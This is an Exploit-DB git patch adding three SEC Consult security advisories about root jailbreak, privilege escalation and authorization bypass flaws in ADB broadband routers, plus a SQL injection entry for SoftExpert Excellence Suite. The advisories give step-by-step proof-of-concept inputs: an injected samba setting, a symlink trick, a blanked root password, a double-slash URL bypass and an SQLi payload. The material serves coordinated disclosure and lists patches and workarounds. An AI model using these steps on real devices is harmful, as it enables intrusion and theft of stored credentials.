From 08110782dd5c1472107d9bd0961ea6a3b6ff52ec Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 6 Jul 2018 05:01:46 +0000 Subject: [PATCH] DB: 2018-07-06 4 changes to exploits/shellcodes ADB Broadband Gateways / Routers - Local Root Jailbreak ADB Broadband Gateways / Routers - Privilege Escalation ADB Broadband Gateways / Routers - Authorization Bypass SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection --- exploits/hardware/local/44983.txt | 288 ++++++++++++++++++++++++++++ exploits/hardware/local/44984.txt | 192 +++++++++++++++++++ exploits/hardware/webapps/44982.txt | 167 ++++++++++++++++ exploits/php/webapps/44981.txt | 21 ++ files_exploits.csv | 4 + 5 files changed, 672 insertions(+) create mode 100644 exploits/hardware/local/44983.txt create mode 100644 exploits/hardware/local/44984.txt create mode 100644 exploits/hardware/webapps/44982.txt create mode 100644 exploits/php/webapps/44981.txt diff --git a/exploits/hardware/local/44983.txt b/exploits/hardware/local/44983.txt new file mode 100644 index 000000000..750e14d74 --- /dev/null +++ b/exploits/hardware/local/44983.txt @@ -0,0 +1,288 @@ +SEC Consult Vulnerability Lab Security Advisory < 20180704-0 > +======================================================================= +title: Local root jailbreak via network file sharing flaw +product: All ADB Broadband Gateways / Routers +(based on Epicentro platform) +vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc. +fixed version: see "Solution" section below +CVE number: CVE-2018-13108 +impact: critical +homepage: http://www.adbglobal.com +found: 2016-06-09 +by: Johannes Greil (Office Vienna) +SEC Consult Vulnerability Lab + +An integrated part of SEC Consult +Europe | Asia | North America + +https://www.sec-consult.com +======================================================================= + +Vendor description: +------------------- +"ADB creates and delivers the right solutions that enable our customers to +reduce integration and service delivery challenges to increase ARPU and reduce +churn. We combine ADB know-how and products with those from a number of third +party industry leaders to deliver complete solutions that benefit from +collaborative thinking and best in class technologies." + +Source: https://www.adbglobal.com/about-adb/ + +"Founded in 1995, ADB initially focused on developing and marketing software +for digital TV processors and expanded its business to the design and +manufacture of digital TV equipment in 1997. The company sold its first set-top +box in 1997 and since then has been delivering a number of set-top boxes, and +Gateway devices, together with advanced software platforms. ADB has sold over +60 million devices worldwide to cable, satellite, IPTV and broadband operators. +ADB employs over 500 people, of which 70% are in engineering functions." + +Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast + +Business recommendation: +------------------------ +By exploiting the local root vulnerability on affected and unpatched devices +an attacker is able to gain full access to the device with highest privileges. +Attackers are able to modify any settings that might have otherwise been +prohibited by the ISP. It is possible to retrieve all stored user credentials +(such as VoIP) or SSL private keys. Furthermore, attacks on the internal network +side of the ISP are possible by using the device as a jump host, depending on +the internal network security measures. + +Network security should not depend on the security of independent devices, +such as modems. An attacker with root access to such a device can enable +attacks on connected networks, such as administrative networks managed by the +ISP or other users. + +It is highly recommended by SEC Consult to perform a thorough security review +by security professionals for this platform. It is assumed that further critical +vulnerabilities exist within the firmware of this device. + +Vulnerability overview/description: +----------------------------------- +1) Local root jailbreak via network file sharing flaw (CVE-2018-13108) +Most ADB devices offer USB ports in order for customers to use them for +printer or file sharing. In the past, ADB devices have suffered from symlink +attacks e.g. via FTP server functionality which has been fixed in more recent +firmware versions. + +The "Network File Sharing" feature of current ADB devices via USB uses a samba +daemon which accesses the USB drive with highest access rights and exports the +network shares with root user permissions. The default and hardcoded setting +for the samba daemon within the smb.conf on the device has set "wide links = +no" which normally disallows gaining access to the root file system of the +device using symlink attacks via a USB drive. + +But an attacker is able to exploit both a web GUI input validation and samba +configuration file parsing problem which makes it possible to access the root +file system of the device with root access rights via a manipulated USB drive. + +The attacker can then edit various system files, e.g. passwd and session +information of the web server in order to escalate web GUI privileges and +start a telnet server and gain full system level shell access as root. + +This is a local attack and not possible via remote access vectors as an +attacker needs to insert a specially crafted USB drive into the device! +Usually not even the ISPs themselves have direct root access on ADB devices +hence this attack is quite problematic for further internal attacks. + +It is possible to change network routes and attack networks and systems within +the internal network of the ISP or add backdoors or sniffers to the device. + +Furthermore, attackers are able to gain access to all stored credentials, +such as PPP, wireless, CPE management or VoIP passwords. + +Proof of concept: +----------------- +1) Local root jailbreak via network file sharing flaw (CVE-2018-13108) +The samba configuration file (smb.conf) of the ADB devices has set the +following default settings. All file system operations will be performed +by the root user as set in the "force user" / "force group" setting of the +exported share: + +[global] +netbios name = HOSTNAME +workgroup = WORKGROUP +wide links = no +smb ports = 445 139 +security = share +guest account = root +announce version = 5.0 +socket options = TCP_NODELAY SO_RCVBUF=65536 SO_SNDBUF=65536 +null passwords = yes +name resolve order = hosts wins bcast +wins support = yes +syslog only = yes +read only = no +hosts allow = 192.168.1.1/255.255.255.0 +[share] +path = /mnt/sdb1/. +read only = false +force user = root +force group = root +guest ok = yes + +An attacker can edit various values such as "netbios name" and "workgroup" via +the web GUI. The web GUI does some basic filtering and newlines are +unfortunately not allowed (the samba config file is line-based) hence a +special bypass has been crafted in order to change the default setting "wide +links = no" to "wide links = yes". This enables symlinks to the root file +system. + +By using the following netbios name and workgroup, samba can be tricked into +allowing symlinks to the root file system of the device: +netbios domain / workgroup = =wide links = yes \ netbios name = wide links = yes +Relevant HTTP POST parameters: +&domainName==wide links = yes \ \ &hostName=wide+links+%3D+yes+%5C + +According to the manpage of smb.conf, any line ending in a \ is continued by the +samba parser on the next line. Furthermore, it states that "Only the first +equals sign in a parameter is significant." - which it seems can be bypassed +by adding a backslash \. The parser now thinks that the "wide links = yes" has +been set and omits the hardcoded "wide links = no" which comes further down +below in the smb.conf file. + +In order to add those special values within the web GUI a proxy server such as +burp proxy is needed because of basic input validation on the client side (not +server side). + +The USB drive needs to be formatted to ext2 or ext3 which is supported by +the ADB device. Then create a symlink to the root file system via the +following command on the attacker's computer: +ln -s / /path/to/usbdevice/rootfs + +After those settings have been changed and the USB drive has been set up, +the USB drive can be inserted into the ADB device. The USB volume needs to be +exported (with read/write permissions) as a share via the web GUI. Afterwards +it can be accessed over the network and the "rootfs" folder example from above +will give an attacker access to the ADB root file system with "read & write" +access permissions as root. + +Most file systems / partitions on the device are mounted read-only per default, +but the most important one "/tmp" contains all settings and is mounted writable +for operations. + +The defaut user "admin" usually has little access rights during normal +operations which can be changed by manipulating the session file of the web +server within /tmp/ui_session_XXX where XXX is the session id of the currently +logged on user, e.g. change: +from: access.dboard/settings/management/telnetserver =|> 2001 +to: access.dboard/settings/management/telnetserver =|> 2220 +etc. (or change all entries for maximum access level) + +This way, an attacker can give himself all/highest access permissions within +the GUI and change all the settings of the device! Hence the telnet or SSH +server can be started even though they might have been disabled by the ISP. +Furthermore, the /tmp/passwd file has to be changed in order to allow root +access via shell/telnet: +change: root:*:0:0:root:/root:/bin/ash +to: root::0:0:root:/root:/bin/ash + +Now telnet into the device with root and no password. +Example of an ADB DV2210 device: + +Trying $IP... +Connected to $IP. +Escape character is '^]'. +Login root: + +BusyBox v1.17.3 (2016-02-11 13:34:33 CET) built-in shell (ash) +Enter 'help' for a list of built-in commands. + +___ ___ ___ ___ +|\__\ /\ \ /\ \ /\ |:| | /::\ \ /::\ \ /::\ |:| | /:/\:\ \ /:/\:\ \ /:/\:\ |:|__|__ /::\~\:\ \ /::\~\:\ \ _\:\~\:\ /::::\__\ /:/\:\ \:\__\ /:/\:\ \:\__\ /\ \:\ \:\__ /:/~~/~ \/__\:\/:/ / \/__\:\/:/ / \:\ \:\ \/__/ +/:/ / \::/ / \::/ / \:\ \:\__ \/__/ /:/ / \/__/ \:\/:/ / +/:/ / \::/ / +\/__/ \/__/ +.................................................................. +yet another purposeful solution by A D B Broadband +.................................................................. +root@$hostname:~# id +uid=0(root) gid=0(root) groups=0(root) +root@$hostname:~# + +Vulnerable / tested versions: +----------------------------- +The following devices & firmware have been tested which were the most recent +versions at the time of discovery. + +The firmware versions depend on the ISP / customer of ADB and may vary! + +ADB P.RG AV4202N - E_3.3.0, latest firmware version, depending on ISP +ADB DV 2210 - E_5.3.0, latest firmware version, depending on ISP +ADB VV 5522 - E_8.3.0, latest firmware version, depending on ISP +ADB VV 2220 - E_9.0.6, latest firmware version, depending on ISP +etc. + +It has been confirmed by ADB that _all_ their ADB modems / gateways / routers +based on the Epicentro platform with USB ports and network file sharing +features are affected by this vulnerability in all firmware versions for all +their customers (ISPs) at the time of identification of the vulnerability. + +Vendor contact timeline: +------------------------ +2016-06-15: Contacting vendor ADB, exchanging encryption keys & advisory +Asking about affected devices / firmware, timeline for hotfix +Fast initial response from ADB providing requested information +2016-06-16: Asking about other affected devices +2016-06-17: Resending previous question due to encryption problems +2016-07-04: Conference call +2016-07 - 2017-04: Further coordination, waiting for firmware release, +implementation & rollout phases for their customers +2018-07-04: Embargo lifted, public release of security advisory + +Solution: +--------- +The firmware versions depend on the ISP / customer of ADB and may vary! + +Patch version: + +ADB P.RG AV4202N >= E_3.3.2, firmware version depending on ISP +ADB DV2210 >= E_5.3.2, firmware version depending on ISP +ADB VV5522 >= E_8.3.2, firmware version depending on ISP +ADB VV2220 >= E_9.3.2, firmware version depending on ISP + +Centro Business 1 >= 7.12.10 +Centro Business 2 >= 8.06.08 + +etc. + +Workaround: +----------- +Restrict access to the web interface and only allow trusted users. +Change any default/weak passwords to strong credentials. +Don't allow remote access to the web GUI via Internet. + +Advisory URL: +------------- +https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +SEC Consult Vulnerability Lab + +SEC Consult +Europe | Asia | North America + +About SEC Consult Vulnerability Lab +The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It +ensures the continued knowledge gain of SEC Consult in the field of network +and application security to stay ahead of the attacker. The SEC Consult +Vulnerability Lab supports high-quality penetration testing and the evaluation +of new offensive and defensive technologies for our customers. Hence our +customers obtain the most current information about vulnerabilities and valid +recommendation about the risk profile of new technologies. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Interested to work with the experts of SEC Consult? +Send us your application https://www.sec-consult.com/en/career/index.html + +Interested in improving your cyber security with the experts of SEC Consult? +Contact our local offices https://www.sec-consult.com/en/contact/index.html +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +EOF J. Greil / @2018 \ No newline at end of file diff --git a/exploits/hardware/local/44984.txt b/exploits/hardware/local/44984.txt new file mode 100644 index 000000000..dc8f6dc47 --- /dev/null +++ b/exploits/hardware/local/44984.txt @@ -0,0 +1,192 @@ +SEC Consult Vulnerability Lab Security Advisory < 20180704-2 > +======================================================================= +title: Privilege escalation via linux group manipulation +product: All ADB Broadband Gateways / Routers +(based on Epicentro platform) +vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc. +fixed version: see "Solution" section below +CVE number: CVE-2018-13110 +impact: critical +homepage: http://www.adbglobal.com +found: 2016-07-11 +by: Stefan Viehböck (Office Vienna) +Johannes Greil (Office Vienna) +SEC Consult Vulnerability Lab + +An integrated part of SEC Consult +Europe | Asia | North America + +https://www.sec-consult.com +======================================================================= + +Vendor description: +------------------- +"ADB creates and delivers the right solutions that enable our customers to +reduce integration and service delivery challenges to increase ARPU and reduce +churn. We combine ADB know-how and products with those from a number of third +party industry leaders to deliver complete solutions that benefit from +collaborative thinking and best in class technologies." + +Source: https://www.adbglobal.com/about-adb/ + +"Founded in 1995, ADB initially focused on developing and marketing software +for digital TV processors and expanded its business to the design and +manufacture of digital TV equipment in 1997. The company sold its first set-top +box in 1997 and since then has been delivering a number of set-top boxes, and +Gateway devices, together with advanced software platforms. ADB has sold over +60 million devices worldwide to cable, satellite, IPTV and broadband operators. +ADB employs over 500 people, of which 70% are in engineering functions." + +Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast + +Business recommendation: +------------------------ +By exploiting the group manipulation vulnerability on affected and unpatched +devices an attacker is able to gain access to the command line interface (CLI) +if previously disabled by the ISP. + +Depending on the feature-set of the CLI (ISP dependent) it is then possible to +gain access to the whole configuration and manipulate settings in the web GUI +and escalate privileges to highest access rights. + +It is highly recommended by SEC Consult to perform a thorough security review +by security professionals for this platform. It is assumed that further critical +vulnerabilities exist within the firmware of this device. + +Vulnerability overview/description: +----------------------------------- +1) Privilege escalation via linux group manipulation (CVE-2018-13110) +An attacker with standard / low access rights within the web GUI is able to +gain access to the CLI (if it has been previously disabled by the configuration) +and escalate his privileges. + +Depending on the CLI features it is possible to extract the whole configuration +and manipulate settings or gain access to debug features of the device, e.g. +via "debug", "upgrade", "upload" etc. commands in the CLI. + +Attackers can gain access to sensitive configuration data such as VoIP +credentials or other information and manipulate any settings of the device. + +Proof of concept: +----------------- +1) Privilege escalation via linux group manipulation (CVE-2018-13110) +It is possible to manipulate the group name setting of "Storage users" and +overwrite the local linux groups called "remoteaccess" or "localaccess" in +(in /etc/group) which define access to Telnet or SSH on the ADB devices. + +It may be possible to overwrite the "root" group as well but it may brick the +device and the default user is already within the "root" group. Hence this +attack has not been further tested. + +The following steps describe the attack: +a) Add a new group called "localaccess" via the web GUI here: +http://$IP/ui/dboard/storage/storageusers?backto=storage + +This will generate the following new group in /etc/group. The original +"localaccess" group will overwritten. + +localaccess:Storage Group:5001: + +b) Then delete this group via the web GUI again, the entry will be removed +from /etc/group completely. + +c) Afterwards, create the following new group name entry via the web GUI and +add your user account (e.g. admin) which should have access to Telnet/SSH +now: + +localaccess:x:20:root,admin, + +d) Now the admin user has been added to the "localaccess" group and the "admin" +account is allowed to login via SSH or Telnet. Excerpt of new /etc/group: + +localaccess:x:20:root,admin,:Storage Group:5001: + +Further attacks on the CLI interface will not be described in detail within +this advisory. It is possible to add new user accounts with highest access rights +("newuser" command) or upload the whole configuration to a remote FTP server +("upload" command). The available feature-set of the CLI depends on the firmware +version. +The XML configuration is encrypted, but can be easily decrypted with access to the +firmware. Then it can be manipulated and uploaded to the device again ("upgrade" +command) which allows privilege escalation by changing permissions or roles +within this file. + +Vulnerable / tested versions: +----------------------------- +The following specific devices & firmware have been tested which were the most +recent versions at the time of discovery: + +The firmware versions depend on the ISP / customer of ADB and may vary! + +ADB P.RG AV4202N - E_3.3.0, firmware version depending on ISP +ADB DV 2210 - E_5.3.0, firmware version depending on ISP +ADB VV 5522 - E_8.3.0, firmware version depending on ISP +ADB VV 2220 - E_9.0.6, firmware version depending on ISP +etc. + +It has been confirmed by ADB that _all_ their ADB modems / gateways / routers +based on the Epicentro platform are affected by this vulnerability in all +firmware versions for all their customers (ISPs) at the time of identification +of the vulnerability _except_ those devices which have a custom UI developed +for the ISP. + +Vendor contact timeline: +------------------------ +2016-07-12: Contacting vendor ADB, sending encrypted advisory, asking about +affected devices +2016-07 - 2017-04: Further coordination, waiting for firmware release, +implementation & rollout phases for their customers +2018-07-04: Embargo lifted, public release of security advisory + +Solution: +--------- +The firmware versions depend on the ISP / customer of ADB and may vary! + +Patch version: + +ADB P.RG AV4202N >= E_3.3.2, firmware version depending on ISP +ADB DV2210 >= E_5.3.2, firmware version depending on ISP +ADB VV5522 >= E_8.3.2, firmware version depending on ISP +ADB VV2220 >= E_9.3.2, firmware version depending on ISP +etc. + +Workaround: +----------- +Restrict access to the web interface and only allow trusted users. +Change any default/weak passwords to strong credentials. +Don't allow remote access to the web GUI via Internet. + +Advisory URL: +------------- +https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +SEC Consult Vulnerability Lab + +SEC Consult +Europe | Asia | North America + +About SEC Consult Vulnerability Lab +The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It +ensures the continued knowledge gain of SEC Consult in the field of network +and application security to stay ahead of the attacker. The SEC Consult +Vulnerability Lab supports high-quality penetration testing and the evaluation +of new offensive and defensive technologies for our customers. Hence our +customers obtain the most current information about vulnerabilities and valid +recommendation about the risk profile of new technologies. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Interested to work with the experts of SEC Consult? +Send us your application https://www.sec-consult.com/en/career/index.html + +Interested in improving your cyber security with the experts of SEC Consult? +Contact our local offices https://www.sec-consult.com/en/contact/index.html +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +EOF J. Greil / @2018 \ No newline at end of file diff --git a/exploits/hardware/webapps/44982.txt b/exploits/hardware/webapps/44982.txt new file mode 100644 index 000000000..051ee5c4a --- /dev/null +++ b/exploits/hardware/webapps/44982.txt @@ -0,0 +1,167 @@ +SEC Consult Vulnerability Lab Security Advisory < 20180704-1 > +======================================================================= +title: Authorization Bypass +product: All ADB Broadband Gateways / Routers +(based on Epicentro platform) +vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc. +fixed version: see "Solution" section below +CVE number: CVE-2018-13109 +impact: critical +homepage: http://www.adbglobal.com +found: 2016-06-28 +by: Johannes Greil (Office Vienna) +SEC Consult Vulnerability Lab + +An integrated part of SEC Consult +Europe | Asia | North America + +https://www.sec-consult.com +======================================================================= + +Vendor description: +------------------- +"ADB creates and delivers the right solutions that enable our customers to +reduce integration and service delivery challenges to increase ARPU and reduce +churn. We combine ADB know-how and products with those from a number of third +party industry leaders to deliver complete solutions that benefit from +collaborative thinking and best in class technologies." + +Source: https://www.adbglobal.com/about-adb/ + +"Founded in 1995, ADB initially focused on developing and marketing software +for digital TV processors and expanded its business to the design and +manufacture of digital TV equipment in 1997. The company sold its first set-top +box in 1997 and since then has been delivering a number of set-top boxes, and +Gateway devices, together with advanced software platforms. ADB has sold over +60 million devices worldwide to cable, satellite, IPTV and broadband operators. +ADB employs over 500 people, of which 70% are in engineering functions." + +Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast + +Business recommendation: +------------------------ +By exploiting the authorization bypass vulnerability on affected and unpatched +devices an attacker is able to gain access to settings that are otherwise +forbidden for the user, e.g. through strict settings set by the ISP. It is also +possible to manipulate settings to e.g. enable the telnet server for remote +access if it had been previously disabled by the ISP. The attacker needs some +user account, regardless of the permissions, for login, e.g. the default one +provided by the ISP or printed on the device can be used. + +It is highly recommended by SEC Consult to perform a thorough security review +by security professionals for this platform. It is assumed that further critical +vulnerabilities exist within the firmware of this device. + +Vulnerability overview/description: +----------------------------------- +1) Authorization bypass vulnerability (CVE-2018-13109) +Depending on the firmware version/feature-set of the ISP deploying the ADB +device, a standard user account may not have all settings enabled within +the web GUI. + +An authenticated attacker is able to bypass those restrictions by adding a +second slash in front of the forbidden entry of the path in the URL. +It is possible to access forbidden entries within the first layer of the web +GUI, any further subsequent layers/paths (sub menus) were not possible to access +during testing but further exploitation can't be ruled out entirely. + +Proof of concept: +----------------- +1) Authorization bypass vulnerability (CVE-2018-13109) +Assume the following URL is blocked/forbidden within the web GUI settings: +http://$IP/ui/dboard/settings/management/telnetserver + +Adding a second slash in front of the blocked entry "telnetserver" will enable +full access including write permissions to change settings: +http://$IP/ui/dboard/settings/management//telnetserver + +This works for many other settings within the web GUI! + +In our tests it was not possible to access subsequent layers, e.g.: +Assume that both the proxy menu and submenu "rtsp" settings are blocked, +a second slash will _not_ enable access to the RTSP settings: +http://$IP/ui/dboard/settings/proxy//rtsp + +Nevertheless, it can't be ruled out that sub menus can be accessed too when +further deeper tests are being performed. + +Vulnerable / tested versions: +----------------------------- +The following devices & firmware have been tested which were the most recent +versions at the time of discovery: + +The firmware versions depend on the ISP / customer of ADB and may vary! + +ADB P.RG AV4202N - E_3.3.0, latest firmware version, depending on ISP +ADB DV 2210 - E_5.3.0, latest firmware version, depending on ISP +ADB VV 5522 - E_8.3.0, latest firmware version, depending on ISP +ADB VV 2220 - E_9.0.6, latest firmware version, depending on ISP +etc. + +It has been confirmed by ADB that _all_ their ADB modems / gateways / routers +based on the Epicentro platform are affected by this vulnerability in all +firmware versions for all their customers (ISPs) at the time of identification +of the vulnerability _except_ those devices which have a custom UI developed +for the ISP. + +Vendor contact timeline: +------------------------ +2016-07-01: Contacting vendor ADB, sending encrypted advisory, asking about +affected devices +2016-07-08: Receiving information about affected devices +2016-07 - 2017-04: Further coordination, waiting for firmware release, +implementation & rollout phases for their customers +2018-07-04: Embargo lifted, public release of security advisory + +Solution: +--------- +The firmware versions depend on the ISP / customer of ADB and may vary! + +Patch version: + +ADB P.RG AV4202N >= E_3.3.2, firmware version depending on ISP +ADB DV2210 >= E_5.3.2, firmware version depending on ISP +ADB VV5522 >= E_8.3.2, firmware version depending on ISP +ADB VV2220 >= E_9.3.2, firmware version depending on ISP +etc. + +Workaround: +----------- +Restrict access to the web interface and only allow trusted users. +Change any default/weak passwords to strong credentials. +Don't allow remote access to the web GUI via Internet. + +Advisory URL: +------------- +https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +SEC Consult Vulnerability Lab + +SEC Consult +Europe | Asia | North America + +About SEC Consult Vulnerability Lab +The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It +ensures the continued knowledge gain of SEC Consult in the field of network +and application security to stay ahead of the attacker. The SEC Consult +Vulnerability Lab supports high-quality penetration testing and the evaluation +of new offensive and defensive technologies for our customers. Hence our +customers obtain the most current information about vulnerabilities and valid +recommendation about the risk profile of new technologies. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Interested to work with the experts of SEC Consult? +Send us your application https://www.sec-consult.com/en/career/index.html + +Interested in improving your cyber security with the experts of SEC Consult? +Contact our local offices https://www.sec-consult.com/en/contact/index.html +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +EOF J. Greil / @2018 \ No newline at end of file diff --git a/exploits/php/webapps/44981.txt b/exploits/php/webapps/44981.txt new file mode 100644 index 000000000..19b7f3e34 --- /dev/null +++ b/exploits/php/webapps/44981.txt @@ -0,0 +1,21 @@ +# Exploit Title: SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection +# Author: Seren PORSUK +# Date: 2018-06-28 +# Type: webapps +# Platform: PHP +# CVE= N/A +# Vendor Homepage : https://www.softexpert.com/solucao/softexpert-excellence-suite/ + +# DETAILS +# A SQL injection vulnerability in the SoftExpert (SE) Excellence Suite 2.0 +# allows remote authenticated users to perform SQL heuristics by pulling +# information from the database with the "cddocument" parameter in the +# "Downloading Electronic Documents" section. + +# Vulnerable Parameter Type : GET +# Vulnerable Parameter : cddocument + +#Vulnerable URL : +http://localhost/se/v75408/generic/gn_eletronicfile_view/1.1/view_eletronic_download.php?class_name=dc_eletronic_file&classwaybusinessrule=class.dc_eletronic_file.inc&action=4&cddocument=[SQLi]&saveas1&mainframe=1&cduser=6853 + +#SQLi Parameter : 2 AND 1=2 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a02c4acab..9fa5c04a5 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9803,6 +9803,8 @@ id,file,description,date,author,type,platform,port 44920,exploits/linux/local/44920.txt,"Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution",2018-06-21,"Paul Taylor",local,linux, 44961,exploits/windows/local/44961.txt,"Enhanced Mitigation Experience Toolkit (EMET) - XML External Entity Injection",2018-07-02,hyp3rlinx,local,windows, 44971,exploits/windows/local/44971.rb,"Boxoft WAV to MP3 Converter 1.1 - Buffer Overflow (Metasploit)",2018-07-03,Metasploit,local,windows, +44983,exploits/hardware/local/44983.txt,"ADB Broadband Gateways / Routers - Local Root Jailbreak",2018-07-05,"SEC Consult",local,hardware, +44984,exploits/hardware/local/44984.txt,"ADB Broadband Gateways / Routers - Privilege Escalation",2018-07-05,"SEC Consult",local,hardware, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -39599,6 +39601,7 @@ id,file,description,date,author,type,platform,port 44924,exploits/php/webapps/44924.txt,"phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (1)",2018-06-21,ChaMd5,webapps,php,80 44926,exploits/php/webapps/44926.txt,"phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username)",2018-06-22,"Berk Dusunur",webapps,php,80 44928,exploits/php/webapps/44928.txt,"phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)",2018-06-22,VulnSpy,webapps,php,80 +44982,exploits/hardware/webapps/44982.txt,"ADB Broadband Gateways / Routers - Authorization Bypass",2018-07-05,"SEC Consult",webapps,hardware,80 44931,exploits/php/webapps/44931.txt,"WordPress Plugin Advanced Order Export For WooCommerce < 1.5.4 - CSV Injection",2018-06-25,"Bhushan B. Patil",webapps,php,80 44932,exploits/linux/webapps/44932.txt,"Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser)",2018-06-25,LiquidWorm,webapps,linux,443 44933,exploits/hardware/webapps/44933.txt,"Intex Router N-150 - Cross-Site Request Forgery (Add Admin)",2018-06-25,"Samrat Das",webapps,hardware,80 @@ -39623,3 +39626,4 @@ id,file,description,date,author,type,platform,port 44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php, 44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php, 44978,exploits/php/webapps/44978.txt,"ShopNx - Arbitrary File Upload",2018-07-04,L0RD,webapps,php, +44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80